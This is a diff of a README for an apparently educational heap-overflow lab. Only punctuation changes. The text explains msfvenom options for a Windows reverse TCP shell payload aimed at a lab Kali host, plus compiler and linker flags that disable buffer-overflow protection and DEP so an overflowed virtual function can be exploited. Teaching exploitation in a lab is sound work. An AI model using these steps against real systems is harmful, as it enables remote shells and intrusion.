DaintyJet/Heap-Overflow-Example/README.md

     * `-a x86`: Generate the shellcode for a x86 32 bit architecture.
     * `--platform Windows`: Generate the shellcode for a Windows machine.
     * `-p `: Payload we are generating shellcode for.
-        * `windows/shell_reverse_tcp`: Reverse TCP payload for Windows
+        * `windows/shell_reverse_tcp`: Reverse TCP payload for Windows.
-        * `LHOST=10.0.2.7`: The remote listening host's IP, in this case our Kali machine's IP 10.0.2.7
+        * `LHOST=10.0.2.7`: The remote listening host's IP, in this case our Kali machine's IP 10.0.2.7.
-        * `LPORT=8080`: The port on the remote listening host's traffic should be directed to in this case port 8080
+        * `LPORT=8080`: The port on the remote listening host's traffic should be directed to in this case port 8080.
-        * `EXITFUNC=process`: Use the process exit function
+        * `EXITFUNC=process`: Use the process exit function.
     * `-f c`: Output in a format useable in C code.
     * `-v SHELL`: Specify SHELL as the variable name.
 3. Compile [Exploit2-2.cpp](./SourceCode/Exploit/exploit2-2.cpp) with the following command:
     ```
     $ cl  /GS- /Z7 /c .\E2-2.cpp
     ```
-    * `cl`: The Visual Studio C/C++ Compiler
+    * `cl`: The Visual Studio C/C++ Compiler.
-    * `/GS-`: Compile with Buffer Overflow Protections disabled
+    * `/GS-`: Compile with Buffer Overflow Protections disabled.
     * `/Z7`: Compile with Debugging information, this is useful in the event you need to debug the program!
-    * `/c`: Compile without linking
+    * `/c`: Compile without linking.
     * This will compiled and link the `E2.cpp` file and produce an executable `E2.exe`.

 4. Link [Exploit2-2.cpp](./SourceCode/Exploit/exploit2-2.cpp) with the following command
     ```
     $ link  /NXCOMPAT:NO .\E2-2.obj
     ```
-    * `link`: The Visual Studio C/C++ Linker
+    * `link`: The Visual Studio C/C++ Linker.
-    * `/NXCOMPAT:NO`: Disable DEP
+    * `/NXCOMPAT:NO`: Disable DEP.

 5. Run the resulting executable file, we should see it pauses execution before we attempt to execute the Virtual Function we overflowed.

     <img src="Images/I43.png" width=600>